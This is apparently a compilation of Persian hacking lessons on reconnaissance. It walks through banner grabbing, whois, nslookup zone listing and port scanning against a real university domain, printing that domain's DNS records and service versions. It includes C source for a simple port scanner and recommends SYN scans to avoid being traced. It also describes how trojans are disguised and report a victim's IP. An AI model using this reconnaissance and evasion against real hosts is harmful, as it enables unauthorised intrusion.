telnet هم جزو مواردي است که در footprinting مورد استفاده قرار مي‌گيرد. کاربرد آن در حالتيست که بخواهيم بدانيم که روي فلان پورت چه برنامه‌اي فال‌گوش‌ه و version آن چنده. به اين صورت که به يک پورت خاص (که مي‌دانيم روي آن سرور باز است) تلنت مي‌کنيم و بعد مي‌بينيم که نتايجي ظاهر مي‌شود که نشان‌دهنده اطلاعاتي‌ است که به‌کار مي‌رود. گاهي با مکثي طولاني مواجه مي‌شويم و هيچ چيزي نمايش داده نمي‌شود، در اين حالت يکي دوبار , Ctrl+Z , Ctrl+D , Ctrl+C , Ctrl+break را مي‌زنيم و خارج مي‌شويم. در مثال پايين جمع‌بندي مواردي که تا حالا از footprinting گفته‌ام را مي‌آورم.

 
◊ جمع‌بندي مطالب گفته شده و بررسي يک سايت

فرض کنيد مي‌خواهيم در مورد www.iums.ac.ir اطلاعاتي کسب کنيم :

◊ اول به سايت پينگ مي‌کنم و ip آن را به‌دست مي‌آورم: 194.225.184.15

◊ به کمک ip که به‌دست آورديم، به کمک يک پورت اسکنر پورت‌ها را بررسي مي‌کنيم و مي‌بينيم که پورت‌هايي مثل ۲۱، ۲۵، ۴۲، ۵۳، ۸۰، ۱۱۰، ۱۱۹، ۱۳۹، ۱۴۳ و ... باز است.

◊ چون domain به ir ختم مي‌شود، براي whois کردن از whois.nic.ir استفاده مي‌کنم و Name Server آن را به دست مي‌آورم که 194.225.184.20 است.

◊ به کمک اين Name Server ، يک nslookup مي‌کنم و به نتايج زير مي‌رسم:
 iums.ac.ir.                    SOA    sina.i........0 345600)
 iums.ac.ir.                    NS     sina.iums.ac.ir
 iums.ac.ir.                    NS     ns1.nic.ir
 iums.ac.ir.                    MX     10   sina.iums.ac.ir
 smtp.iums.ac.ir.               A      195.146.34.181
 sina.iums.ac.ir.       HINFO  Sun-SuperSPARC5/75  UNIX-Solaris-2.6
 sina.iums.ac.ir.               MX     10   sina.iums.ac.ir
 sina.iums.ac.ir.               A      194.225.184.20
 sina.iums.ac.ir.               A      195.146.34.181
 sun.iums.ac.ir.                CNAME  sina.iums.ac.ir
 cisco.iums.ac.ir.              CNAME  router.iums.ac.ir
 webmail.iums.ac.ir.            A      195.146.34.181
 linux.iums.ac.ir.              A      194.225.184.19
 linux.iums.ac.ir.      HINFO  Intel-Xeon/800  RedHat-Linux-7.2
 mta.iums.ac.ir.                A      195.146.34.181
 pop3.iums.ac.ir.               CNAME  sina.iums.ac.ir
 localhost.iums.ac.ir.          A      127.0.0.1
 proxy.iums.ac.ir.              CNAME  arvand.iums.ac.ir
 www.iums.ac.ir.                A      195.146.34.180
 atrak.iums.ac.ir.              A      194.225.184.14
 ns1.iums.ac.ir.                CNAME  sina.iums.ac.ir
 arvand.iums.ac.ir.             A      194.225.184.13
 router.iums.ac.ir.             A      194.225.184.1
 router.iums.ac.ir.     HINFO  Cisco3640/Access-Server  IOS-IP-12.0
 iums.ac.ir.                    SOA    sina.iu.......3456000 345600)
تک تک سطرهاي اين نتايج کاربرد دارد که خواهيم رسيد. الان فقط در مورد HIFNO صحبت مي‌کنم که براي مشخص تر بودن در بالا به صورت کمي فرورفته‌تر نوشتم. مثلا:
sina.iums.ac.ir.       HINFO  Sun-SuperSPARC5/75  UNIX-Solaris-2.6

HIFNO براي تعيين نوع کامپيوتر و سيستم‌عامل سرور اهميت دارد. در اين سطر مشخص است که sina.iums.ac.ir از Sun-SuperSPARC5/75 UNIX-Solaris-2.6 استفاده مي‌کند.

◊ چون پورت‌هاي باز را هم توسط پورت اسکنر به دست آورده‌ام به آنها تلنت مي‌کنم با دستور:
telnet www.iums.ac.ir portnum
نتايج حاصل از بعضي را مي‌بينيد:

25 :
... master.iums.ac.ir Microsoft ESMTP MAIL Service, Version: 5.0.2195.4905 ready at 220
پس پورت ۲۵ (smtp) در آن کامپيوتر از Microsoft ESMTP MAIL Service, Version: 5.0.2195.4905 استفاده مي‌کند.

110 :
.OK Microsoft Exchange 2000 POP3 server version 6.0.5762.3 (master.iums.ac.ir) ready+
پس پورت ۱۱۰ (pop3) در آن کامپيوتر از Microsoft Exchange 2000 POP3 server version 6.0.5762.3 استفاده مي‌کند.

119 :
NNTP Service 5.00.0984 Version: 5.0.2195.2966 Posting Allowed

و ...

خلاصه درس: در اين درس يک Port Scanner ساده به اسم acw_spscan به زبان C می‌نويسيم. درک مطالب اين درس نياز به آشنايی با زبان برنامه‌نويسی C دارد.

 

◊ يادآوری

قبلا گفتم که برای اينکه هکر خوبی بشيد، زبان C را بايد ياد بگيريد. امروز اولين برنامه اينترنتی خود را به زبان C شروع می‌کنيم.برنامه‌ای که امروز می‌نويسيم، يک پورت اسکنر ساده (Simple Port Scanner) است که acw_spscan.exe نام دارد. acw يعنی Artawill Commandline Windows و spscan يعنی Simple Port Scanner. من سورس اين برنامه را با Borland C++ 5.02 کامپايل کردم ولی فکر کنم روی هر نوع کامپايلر C ويندوز کار کند.
يک سری نکات در مورد هر برنامه‌ای که با C برای ويندوز خواهم نوشت هست که فقط امروز می‌گم و بعدا ديگه اشاره نخواهم کرد.
۱- هر برنامه‌ای که من می‌نويسم، شامل دو فايل است که بايد داون‌لود کنيد: فايل اصلی که پسوند C يا CPP دارد و يک فايل به يکی از نامهای acw_sock.h يا agw_sock.h يا acu_sock.h ويا axu_sock.h که با توجه به نوع سيستم‌عامل (ويندوز يا يونيکس) و نوع ظاهر برنامه (خط‌ فرمان يا گرافيکی) يکی از اين چهارتا خواهد بود. اگر برنامه برای ويندوز نوشته شده است، بايد قبل از کامپايل نهايی فايل WS2_32.LIB را هم به پروژه اضافه کنيد.
۲- هر بار که برنامه جديدی خواهم نوشت فايلی که پسوند h دارد، کامل و کامل‌تر می‌شود، پس هر وقت يک فايل جديد C يا CPP داون‌لود می‌کنيد، فايل h مربوطه را هم داون‌لود کنيد.
۳- کامپايلر مورد استفاده در برنامه‌های ويندوز Borland C++ 5.02 است. اگر از کامپايلر ديگری استفاده می‌کنيد، ممکن است لازم باشد که تغييراتی اعمال کنيد.
۴- سورس تمام توابع و برنامه‌ها مشمول کپی‌ رايت است ولی استفاده از توابع در برنامه‌هايتان در صورت عدم اعمال تغييرات در سورس بلامانع است. - اينههههههه !

 

 

◊ درباره برنامه Artawill Command-prompt Windows - Simple Prot Scanner = acw_spscan

برنامه acw_spscan.exe عمل پورت اسکنينگ را به صورت tcp و udp انجام می‌دهد. همانطوری که از نامش پيداست، برای ويندوز و به‌صورت خط فرمان عمل می‌کند.

 

اگر در command prompt تايپ کنيد: acw_spscan ،خطوط زير چاپ می‌شود:

Artawill Command-line Windows SimplePortScanner (acw_spscan.exe) v1.0

Programmed by Araz Samadi, ArtaWill.com

 

Usage: acw_spscan    []

بنابراين مثلا اگر بخواهم سايت پی آر دو را (که ip آن 63.148.227.65 است) برای پورت‌های ۲۰ تا ۳۰ به صورت tcp اسکن کنم، بايد بنويسم:

acw_spscan 63.148.227.65 20 30 tcp

و جواب می‌شنوم:

Artawill Command-line Windows SimplePortScanner (acw_spscan.exe) v1.0

Programmed by Araz Samadi, ArtaWill.com

 

>TCP

 [63.148.227.65] TCP    21 :  OPEN

 [63.148.227.65] TCP    25 :  OPEN

 

Simple Port Scanner End.

که نشان می‌دهد، پورت‌های ۲۱ و ۲۵ باز است.

 

 

◊ بررسی سورس برنامه

من برای راحتی کار برنامه‌نويسی شبکه، يک سری تابع تعريف کرده و آنها را در فايل acw_sock.h قرار داده‌ام که در برنامه اصلی آن را include می‌کنم. حال به بررسی توابع مورد استفاده در برنامه امروز می‌پردازم ( اگر خواهان اطلاعات بيشتری هستيد، سورس اين توابع را از فايل acw_sock.h بخوانيد ):

۱- (int arta_win_LoadWinsock(char, char    ==>
در برنامه‌نويسی ويندوز قبل از استفاده از سوکت(socket)، بايد WinSock را لود کرد که من اين کار را با اين تابع انجام می‌دهم. اگر بپرسيد سوکت چيست، می‌گويم سوکت ارتباطی است از نوع TCP/IP که از پورت خاصی از يک کامپيوتر به سوی يک پورت خاص از يک کامپيوتر ديگر برای رد و بدل کردن داده‌ها ايجاد می‌شود. کل برنامه‌نويسی شبکه به کمک C با استفاده از سوکت‌هاست.

if(arta_win_LoadWinsock(2,0)==-1)

   arta_commandline_win_DieWithError("ERR: Cannot load WinSock!");

دو خط بالا برای لودکردن WinSock ورژن 2.0 به‌کار می‌رود.

۲- (void arta_win_CleanWinsock(void    ==>
در آخر برنامه بايد WinSockی را که با دستور بالا ايجاد کرده‌ايم، به‌کمک دستور اين قسمت ببنديم:

arta_win_CleanWinsock();

 

۳- (int arta_win_CreateTcpSocket(void    ==>
اين تابع يک سوکت از نوع tcp ايجاد می‌کند.

if((sock=arta_win_CreateTcpSocket())==-1)

   arta_commandline_win_DieWithError("ERR: Cannot Create Socket!");

دو خط بالا برای ايجاد يک سوکت tcp به‌کار می‌رود.

۴- (int arta_win_CreateUdpSocket(void    ==>
اين تابع يک سوکت از نوع udp ايجاد می‌کند.

if((sock=arta_win_CreateUdpSocket())==-1)

   arta_commandline_win_DieWithError("ERR: Cannot Create Socket!");

دو خط بالا برای ايجاد يک سوکت udp به‌کار می‌رود.

۵- (void arta_win_CloseSocket(int    ==>
اين تابع، سوکتی را که با يکی از دو دستور بالا ايجاد کرده‌ايم، می‌بندد.

arta_win_CloseSocket(sock);

 

۶- void arta_win_CreateServerAddressStructure
(* struct sockaddr_in *, unsigned short, char )    ==>
اين تابع اطلاعات لازم برای برقراری اتصال را مانند IP, Port می‌گيرد و در يک structure مخصوص از نوع sockaddr_in قرار می‌دهد. اين structure در توابع بعدی به‌کار می‌رود.

arta_win_CreateServerAddressStructure(&addr,port,IP);

 

۷- (* int arta_win_EstablishTcpSocketConnection(int, struct sockaddr_in    ==>
اين تابع sock (که از تابع‌های ۳ يا ۴ به‌دست آمده) و addr را (که از تابع ۶ حاصل شده) می‌گيرد و يک ارتباط واقعی tcp تشکيل می‌دهد. اگر ارتباط به‌وجود آمد، پورت باز است وگرنه بسته است.

if(arta_win_EstablishTcpSocketConnection(sock, &addr)==-1){

    ....

}

 

۸- (* int arta_win_EstablishUdpSocketConnection(int, struct sockaddr_in    ==>
اين تابع sock (که از تابع‌های ۳ يا ۴ به‌دست آمده) و addr را (که از تابع ۶ حاصل شده) می‌گيرد و يک ارتباط واقعی udp تشکيل می‌دهد. اگر ارتباط به‌وجود آمد، پورت باز است وگرنه بسته است.

if(arta_win_EstablishUdpSocketConnection(sock, &addr)==-1){

    ....

}

 

حالا يک توضيح کلی می‌دم:

اولين سطرهای برنامه را بررسی می‌کنم

/* An ArtaWill Production - copyright(c) ArtaWill.com              */

/* Programmed by: M.E */

/* This Source code and its Functions can be used - but no ....    */

/*     Funcions source or code can be done !                       */

 

#include       /* for printf(), fprintf() */

#include      /* for exit() */

#include      /* for strings */

#include "acw_sock.h"

 

void main(int argc, char *argv[])

{

    struct sockaddr_in addr;

    char *IP;

    int sock;

    int port;

    int startport, endport;

    int tcp_udp_both=1;

 

    arta_commandline_win_StartMessage("SimplePortScanner ......");

 

    if ((argc != 4) && (argc != 5))    /* Test for correct ...... */

    {

        arta_commandline_win_DieWithError("Usage: acw_spscan []\n");

        exit(1);

    }

 

   IP = argv[1];

   startport = atoi(argv[2]);

   endport = atoi(argv[3]);

   if(argc==5){

     if(stricmp(argv[4],"udp")==0){tcp_udp_both=2;}

     else if (stricmp(argv[4],"both")==0){tcp_udp_both=3;}

   }

 

   if(arta_win_LoadWinsock(2,0)==-1)

    arta_commandline_win_DieWithError("ERR: Cannot load WinSock!");

اوايل برنامه يه‌سری توضيحات
بعدش يک سری هدر (header) را include کرده‌ام از جمله acw_sock.h را
بعدش main شروع می‌شود و يک سری تعريف متغير داريم که به نوع اين متغير ها دقت کنيد.
بعد از روی ورودی خط‌ فرمان، متغير‌ها ست می‌شوند.
دو سطر آخر هم يک WinSock لود می‌کند.

حالا ادامه:

 

   if(tcp_udp_both!=2){                                              puts(">TCP");

 for(port=startport;port<=endport;port++){

    printf(" [%s] TCP %5d :  Testing... ",IP,port);

 

    if((sock=arta_win_CreateTcpSocket())==-1)

       arta_commandline_win_DieWithError("ERR: Cannot Crea....");

 

     arta_win_CreateServerAddressStructure(&addr,port,IP);

 

     if(arta_win_EstablishTcpSocketConnection(sock, &addr)==-1){

       printf("\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b........");

      }

     else{

       printf("\b\b\b\b\b\b\b\b\b\b\b");

       printf("OPEN        \n");

     }

 arta_win_CloseSocket(sock);

 }

}

اگر قرار باشد که tcp چک شود، اين خطوط اجرا می‌شوند. در اين سطرها يک اتصال tcp خاص بايد ايجاد شود و اگر اين عمل موفق بود، آن پورت باز است.

حالا ادامه برنامه:

if(tcp_udp_both!=1){

   puts(">UDP ");

 for(port=startport;port<=endport;port++){

    printf(" [%s] UDP %5d :  Testing... ",IP,port);

 

    if((sock=arta_win_CreateUdpSocket())==-1)

       arta_commandline_win_DieWithError("ERR: Cannot Cre....!");

 

     arta_win_CreateServerAddressStructure(&addr,port,IP);

 

     if(arta_win_EstablishUdpSocketConnection(sock, &addr)==-1){

       printf("\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b.....");

      }

     else{

       printf("\b\b\b\b\b\b\b\b\b\b\b");

       printf("OPEN        \n");

     }

  arta_win_CloseSocket(sock);

 }

}

همان کارها را ولی اين‌بار برای udp انجام می‌دهد.

و حالا آخر برنامه:

puts("\n");

   arta_commandline_win_EndMessage("Simple Port Scanner");

 

   arta_win_CloseSocket(sock);

   arta_win_CleanWinsock();

 

   exit(0);

}

در اينجا پيغام انتهايی چاپ شده و سوکت بسته می‌شود.

- خلاصه درس: انواع Scanning را مشخص می‌کنيم. بحث Port Scanning را آغاز می‌کنيم و از نرم‌افزار ipEye برای Port Scanning استفاده می‌کنيم.
 
◊ معمول‌ترين Scanning ها کدامند؟

دو نوع معمول Scanning وجود دارد:

۱- IP Scanning :
فرض کنيد که شما يک سری IP مربوط به يک ISP خاص را داريد و می‌خواهيد بدانيد که در اين لحظه کدام‌ها فعال (up) هستند تا فقط آنها را بررسی کنيد و نه‌ همه را. اين موضوع را بعدا توضيح می‌دم ( اين کار معمولا موقعی پيش می‌آيد که قرار است کلاينت هک کنيد و مهم نيست چه کسی باشد )

۲- Port Scanning :
در اين حالت ما IP يا IPهای مورد نظر را انتخاب کرده‌ايم و حالا می‌خواهيم بدانيم که کدام پورت‌ها روی آن کامپيوترها باز است. اين کار به کمک نرم‌افزارهای خاصی انجام می‌شود که مبحث امروز ماست.

 
◊ چگونه يک ارتباط TCP برقرار می‌شود که بگوييم فلان پورت باز است يا نه؟

برای اينکه تعيين کنيم که يک پورت روی يک سرور باز است يا نه، معمولا بايد يک TCP connect scan انجام دهيم. اول اين را بگم که Port Scanning انواع مختلف دارد که فعلا ما نوع TCP connect را مدنظر داريم. اين نوع اسکن سه مرحله دارد که به آن TCPs 3-way handshakeمی‌گويند:
۱- اول کامپيوتر ما به سمت سرور يک SYN packet می‌فرستد که به معنی درخواست اتصال است.
۲- اگر سرور اين درخواست را قبول کند، در مرحله دوم سرور به سمت ما يک SYN/ACK packet می‌فرستد.
۳- در مرحله آخر کامپيوتر ما يک ACK packet به سمت سرور می‌فرستد.

نوع ديگری از پورت اسکن TCP SYN scan نام دارد. با توجه به اينکه معمولا اگر پورت اسکن به روش بالا (TCP connect scan) انجام دهيم، معمولا در سرور اين اتصال ذخيره خواهد شد و بعدا می‌تواند ما را رديابی کنند، به جای آن می‌توان از TCP SYN scan استفاده کرد. در اين نوع اسکن، مراحل ۱ و ۲ از بالا انجام می‌شود ولی مرحله ۳ نه! اگر در مرحله ۲ به ما يک SYN/ACK برسد، آن پورت باز است و اگر يک RST/ACK برسد، يعنی بسته است.

انواع ديگری از پورت اسکنينگ هم وجود دارد مثل UDP scan, TCP Window scan, TCP ACK scan, TCP Null, TCP Xmas Tree, TCP FIN Scan

 
◊ چگونه می‌توان عمل Port scanning را انجام داد؟

در تمام مطالبی که تا اين مرحله گفته‌ام سعی کرده‌ام که فقط از ابزارهای موجود در ويندوز استفاده کنم و هيچ ابزار ديگری به‌کار نبرم، اما در مبحث پورت اسکنينگ چون هيچ ابزاری در ويندوز برای اين‌ کار نيست، به‌ناچار بايد يک سری برنامه را از اينترنت داون‌لود کنيد. (توجه داشته باشيد که فعلا حرفی از لينوکس نزده‌ام و سعی می‌کنم فعلا هيچ بحثی را در مورد آن مطرح نکنم)

برای Port Scanning می‌توان از ابزارهای مختلفی استفاده کرد که اکثرا برای لينوکس طراحی شده‌اند، اما مهم‌ترين پورت اسکنرها برای ويندوز عبارتند از:

۱- نرم‌افزار NMapWin v1.3.0 :
نسخه گرافيکی و مخصوص ويندوز برای nmap است (nmap در لينوکس استفاده می‌شود). nmap از کامل‌ترين ابزارهايی است که هکر‌ها استفاده می‌کنند که علاوه بر توانايی انواع پورت اسکنينگ‌ها، می‌تواند کارهای بسياری چون تشخيص سيستم‌عامل سرور و ... را انجام دهد. اين ابزار را بعدا توضيح خواهم داد ولی فعلا برای کار ما بيش‌ از حد کامله ;-)

۲- NetScanTools Pro 2000 :
اين هم از بهترين‌هاست ولی چون پولی است به‌ جای داون‌لود بايد در CD هايی که در بازار هست پيدايش کنيد.

۳- WinScan :
برای اسکن کردن TCP (ونه UDP) می‌توانيد از آن استفاده کنيد. من زياد ازش خوشم نيومد.

۴- ipEye v1.2 :
من در این درس از اين نرم‌افزار استفاده خواهم کرد، برای داون‌لود آن می‌توانيد به سايت http://www.ntsecurity.nu/ مراجعه کنيد يا مستقيما با کليک روی اين لينک آن را داون‌لود کنيد. لازم است بگويم که اين نرم‌افزار فقط در ويندوز ۲۰۰۰ و xp کار می‌کند و نيز در يک بار اجرا فقط يک ip را می‌تواند تست کند. ضمنا فقط TCP را تست می‌کند.

 
◊ چگونه از ipEye برای پورت اسکنينگ استفاده کنيم؟

با تايپ ipEye در command prompt اين نتايج ظاهر می‌شود:
ipEye 1.2 - (c) 2000-2001, Arne Vidstrom (arne.vidstrom@ntsecurity.nu)
          - http://ntsecurity.nu/toolbox/ipeye/
 
Error: Too few parameters.
 
Usage:
 
  ipEye   -p  [optional parameters]
  ipEye   -p 
 [optional parameters]
 
   is one of the following:
     -syn  = SYN scan
     -fin  = FIN scan
     -null = Null scan
     -xmas = Xmas scan>br>
     (note: FIN, Null and Xmas scans dont work against Windows systems.
 
  [optional parameters] are selected from the following:
     -sip   = source IP for the scan
     -sp  = source port for the scan
     -d   = delay between scanned ports in milliseconds
                         (default set to 750 ms)

فرض کنيد که می‌خواهيم سايت سازين را از نظر پورت‌ها از پورت ۱ تا ۲۰۰ تست کنيم. اول بايد ip آن را به دست بياوريم که می‌شود، 63.148.227.65 و حالا به کمک دستور زير آن را بررسی می‌کنيم:
ipeye 63.148.227.65 -syn -p 1 200
دقت کنيد که 63.148.227.65 عدد ip سازين، syn- يعنی SYN SCAN و p 1 200- يعنی تست از پورت ۱ تا ۲۰۰ باشد. البته پارامترهای ديگری را هم می‌شود ست کرد که فعلا به درد ما نمی‌خورد. با اجرای اين دستور به نتايج زير می‌رسيم:
ipEye 1.2 - (c) 2000-2001, Arne Vidstrom (arne.vidstrom@ntsecurity.nu)
          - http://ntsecurity.nu/toolbox/ipeye
 
  1-20 [drop]
  21 [open]
  22 [closed or reject]
  23-24 [drop]
  25 [open]
  26-52 [drop]
  53 [open]
  54-79 [drop]
  80 [open]
  81-109 [drop]
  110 [open]
  111-142 [drop]
  143 [open]
  144-200 [drop]
  201-65535 [not scanned]
Closed يعنی کامپيوتر در آن طرف هست ولی به پورت گوش نمی‌دهد، Reject يعنی اينکه يک firewall هست که اجازه اتصال به آن پورت را نمی‌دهد، Drop يعنی اينکه يک firewall همه‌چيز را پس‌ می‌زند و يا اصلا کامپيوتری اونور نيست، Open هم که يعنی باز.
در مورد سازين می‌بينيد که از بين پورت‌های ۱ تا ۲۰۰ ، پورت‌های ۲۱، ۲۵، ۵۳، ۸۰، ۱۱۰، ۱۴۳ باز است و می‌توان به‌ آنها telnet کرد. دقت کنيد که تا تمام پورت‌هايی که مشخص شده، تست نشده است، هيچ نتيجه‌ای نشان داده نمی‌شود و يه‌کم صبر می‌خواد.

 خلاصه درس: nslookup را بررسی می‌کنيم. پورت‌ها را تقسيم‌بندی می‌کنيم و TCP و UDP را مورد بررسی قرار می‌دهيم.

 

◊ چگونگی استفاده از nslookup

وقتی که DNS Server يک سايت را به‌دست آورده باشيم (از طريق whois )، به کمک دستور nslookup مي‌توان اطلاعاتی اضافی در مورد آن سايت پيدا کرد. طريقه استفاده اين دستور به صورت زير است:
فرض کنيد که من می‌خواهم از Domain Server سايت خودم (far30.com) اطلاعاتی به‌دست بيارم. اگر به اين سايت whois کنم، می‌بينم که دوتا Name Server يا DNS Server دارد:

s1.prdev.com

s2.prdev.com

حالا ديگر آدرس DNS Server مربوط به far30.com را دارم و می‌توانم شروع کنم:

۱- دستور nslookup را در command prompt نوشته و اجرا می‌کنم:

C:\>nslookup

و نتايج را می‌بينم:

*** Cant find server name for address 192.168.20.3: Non-exi...

*** Cant find server name for address 192.168.20.1: Non-exi...

*** Default servers are not available

Default Server:  UnKnown

Address:  192.168.20.3

 

>

علامت > يعنی شما می‌توانيد دستورات را تايپ کنيد.

۲- در جلوی علامت < دستور زير را تايپ می‌کنيم:

> server dns_server

که به جای dns_server بايد آدرس DNS Server سايت موردنظر را بنويسم. پس برای سايت far30.com می‌شود:

> server s1.prdev.com

و جواب می‌شنوم:

Default Server:  s1.prdev.com

Address:  63.148.227.63

اگر در اين مرحله پيغام خطا می‌گيريد، بايد دوباره اين دستور را تايپ کنيد و نيز می‌توانيد از DNS Server دومی که در whois برای far30.com به‌دست آورديم ، استفاده کنيم.

۳- دستور زير را تايپ کنيد:

> set type=any

۴- حالا به کمک دستور زير اطلاعات را به‌دست می‌آوريم:

> ls -d  site_name .

که برای far30.com می‌شود:

>ls -d far30.com.

دقت کنيد که بعد از اسم سايت يک نقطه (dot) گذاشته‌ام، شما هم بهتر است اينطوری بنويسيد.
نتايج زير حاصل می‌شود:

[s1.prdev.com]

 far30.com.                     SOA    s1.prdev.com admin.prdev.com.

(2002070412 3600 600 86400 3600)

 far30.com.                     A      63.148.227.65

 far30.com.                     NS     s1.prdev.com

 far30.com.                     NS     s2.prdev.com

 far30.com.                     MX     10   mail.far30.com

 far30.com.                     MX     15   far30.com

 ftp                            CNAME  far30.com

 mail                           A      63.148.227.65

 www                            CNAME  far30.com

 far30.com.                     SOA    s1.prdev.com admin.prdev.com.

(2002070412 3600 600 86400 3600)

>

بعدا در مورد کاربرد تک‌تک اينها صحبت خواهم کرد ولی بعضی از آنها همين‌طوری هم اطلاعات واضحی دارند.

۵- دستور exit را مقابل < تايپ کرده و از nslookup خارج می‌شويم.

شما برای تمرين همين کار را در مورد سايت neda.net.ir انجام دهيد.

 

 

◊ تقسيم‌بندی پورت‌ها از روی شماره آنها

۱- پورت‌های 0 تا 1023 :
مشهورترين پورت‌ها هستند و معمولا هرکدام برای يک سرويس خاص استفاده می‌شود. با تعدادی از اين پورت‌ها در جلسات قبل آشنا شده‌ايد.

۲- پورت‌های 1024 تا 49151 :
اين سری از پورت‌ها مشخصا با هيچ‌يک از سرويس‌های اينترنتی مرتبط نيستند بلکه وقتی که با يک ابزار شبکه مانند مرورگر اينترنت(مثل Internet Explore يا Netscape Navigator )، نرم‌افزار ارسال و دريافت E-mail (مثل Outlook يا Edura )، نرم‌افزارهای FTP (مثل WS-FTP يا Cute-FTP ) کار می‌کنيد، يکی از اين پورت‌ها به صورت random باز شده و يک ارتباط با سرور (با توجه به‌نوع سرويس اينترنتی که می‌دهد که يکی از پورت‌های 0 تا 1023 است) برقرار شده و داده‌ها ارسال و دريافت می‌شوند. يعنی پورت شما يکی از پورت‌های اين قسمت است و پورت سرور يکی از پورت‌های بالايی.اين سری پورت‌ها را پورت‌های register شده هم می‌گويند.

۳- پورت‌های 49152 تا 65535 :
اين سری از پورت‌ها به‌ندرت استفاده می‌شوند. کاربرد اساسی آنها برای يک سری سرويس‌های خاص اينترنتی است و يا توسط trojanها (که برای Hack کردن کامپيوتر است) است. البته خيلی از trojanهای معروف از پورت‌های رديف ۲ هم استفاده می‌کنند و اين تقسيم‌بندی‌ها هميشه برقرار نيست و به‌همين علت است که گاهی پورت‌ها را به دو‌دسته زير 1024 و بالای 1024 تقسيم‌ می‌کنند.

 

 

◊ TCP و UDP چيست؟

مدل TCP/IP که برای ارتباط اينترنتی به‌کار می‌رود، می‌توان به لايه‌های مختلفی تقسيم‌بندی کرد که بعدا بيشتر توضيح می‌دم، اما يکی از اين لايه‌ها، لايه ارتباط host2host است که خود شامل دو پروتکل است به نامهای TCP و UDP :

۱- (TCP (Transmission Control Protocol :
اين پروتکل قوی‌تر و قابل اعتمادتر است و اصولا پروتکل مهمتری نسبت به UDP محسوب می‌شود. اين پروتکل توانايی بازبينی بسته‌هاو کنترل خطا را هم دارد.

۲- (UDP (User Datagram Protocol :
اين پروتکل برای کاهش overflow طراحی شده است و در خيلی از موارد وابسته به TCP است.

نکته مهم اين است که وقتی با يک پورت خاص روی يک کامپيوتر ديگر ارتباط برقرار می‌کنيم، اين ارتباط می‌تواند از نوع TCP يا UDP باشد. بنابراين وقتی می‌خواهيم يک کامپيوتر خاصی را از نظر پورت‌ها بررسی کنيم، هردو بايد بررسی شود.

 

هر برنامه نويس ماهرى مى تواند خودش برنامه اى بنويسد كه با نصب آن در سيستم شما قادر به كارهاى خاصى باشد ، ولى تعدادى از اين دست برنامه ها به معروفيت جهانى دست پيدا كرده اند شايد دليل آن ظاهر زيباى برنامه و رابط كاربرى ساده باشد كه هر كاربر متوسط به بالاى كامپيوتر با كمى آموزش و تمرين مى تواند از آن استفاده كند .

ساختار كلى يك نرم افزار هك :

به طور معمول هر نرم افزار هك از سه قسمت اصلى تشكيل شده .

قسمت اول : server  كه همان سرور هك يا Trojan  است . اين همان فايلى است كه با وارد شدن و اجرا شدن روى سيستم شما ، به نفوذگر اجازه مى دهد كنترل سيستم شما را در اختيار بگيرد و يا پسوردهاى شما را بدزدد . اين فايل از نوع فايلهاى اجرايى مى باشد .

قسمت دوم : Edit server  كه نرم افزارى است كه به نفوذگر اجازه مى دهد قبل از اينكه سرور هك را براى شما بفرستد تغييرات دلخواه خود را بر روى آن اعمال كند . به عنوان مثال مى تواند سرور هك را طورى تنظيم كند كه به صورت خودكار هر بار كه شما به اينترنت متصل مى شويد به گونه اى كه شما پى نبريد يك Email  به نفوذگر بفرستد و شماره IP شما  و پورت باز سيستم را به او اطلاع دهد . ( در مورد IP  و Port سروقت توضيح ميدم. ) و يا اينكه نفوذگر به وسيله Edit server  مى تواند سرور هك را به يك فايل ديگر مثلا" فايل اجرايى يك Game يا يك تصوير و يا هر فايل ديگر پيوند بزند و براى شما بفرستد تا شما در اين مورد شك نكنيد . همچنين مى تواند Icon  سرور هك را عوض كند تا مثلا به

عنوان يك Jpg  به نظر برسد .

قسمت سوم : برنامه اصلى است كه پس از اتمام همه كارها و هنگامى كه سرور هك بر روى دستگاه شما اجرا شد نفوذگر با استفاده از آن هنگامى كه شما به اينترنت متصل هستيد بدون اينكه شما بفهميد به سيستم شما متصل مى شود و كنترل آن را در دست مى گيرد .

در حال حاضر شما كليه مراحلى را كه در روند هك كردن يك كامپيوتر شخصى انجام مى شوند مد نظر قرار داديد .

ويروسها برنامه هاي كوچكي هستند كه در دل برنامه هاي بزرگتر قرار گرفته و به ممحض ورود به يك سيستم فعال ميشوند و به سيستم آسيب ميرسانند.

امروزهويروسها توسط نامه هاي الكترونيكي جابجا شده و از طريق شبكه منتشر ميشوند.ويروس هاي امروزي، خودنامه هايي به آدرس هاي مشخص ارسال كرده كه شامل آن ويروس است.

ويروسها ممكن است در يك خاص فعال شوند و كار تخريب را شروع كنند، مانند ويروس چرنوبيل.

براي در امان ماندن از شر ويروسها ميتوان اقدامات زير را انجام داد:

1-نامه هاي مشكوك را به هيچ عنوان باز نكنيد.

2-هميشه از برنامه هاي ضد ويروس استفاده كنيد.

3-قبل از به كار گرفتن شبكه، از به روز بودن برنامه ضد ويروس خود مطمين شويد.

 

- خلاصه درس: در اين درس درباره RFC صحبت می‌کنيم.

 

◊چيست RFC ؟

متون بسيار کامل ولی خشک و ثقيل که در مورد مفاهيم مختلف شبکه بحث می‌کنند. اين فايل‌ها به صورت متنی و با پسوند txt هستند و به‌عنوان مرجع (برای مراجعه و نه مطالعه کامل) کاربرد دارند. اين فايل‌ها يک‌بار منتشر شده و هرگز تغيير داده نمی‌شوند (حتی اگر حاوی اشتباه باشند.)

 

 

◊ فايل‌های RFC از کجا قابل دسترسی هستند؟

RFCها از سايت‌های بسياري قابل دسترس هستند ولی سايت مورد علاقه من برای RFCها، سايت زير است:

http://www.ietf.org/rfc/xxxxxxx.txt

که به‌جای xxxxxxx نام rfc موردنظر را می‌نویسيم. مثلا برای دسترسی به rfc791 بايد آدرس را به‌ صورت زير تايپ کنيم:

http://www.ietf.org/rfc/rfc791.txt

 

 

◊ ليست مشهورترين RFCها:

 

+General Information

RFC1360 IAB Official Protocol Standards

RFC1340 Assigned Numbers

RFC1208 Glossary of Networking Terms

RFC1180 TCP/IP Tutorial

RFC1178 Choosing a Name for Your Computer

RFC1175 FYI on Where to Start:

        A Bibliography of Inter-networking Information

RFC1173 Responsibilities of Host and Network Managers:

        A Summary of the Oral Tradition of the Internet

RFC1166 Internet Numbers

RFC1127 Perspective on the Host Requirements RFCs

RFC1123 Requirements for Internet Hosts—Application and Support

RFC1122 Requirements for Internet Hosts—Communication Layers

RFC1118 Hitchhikers Guide to the Internet

RFC1011 Official Internet Protocol

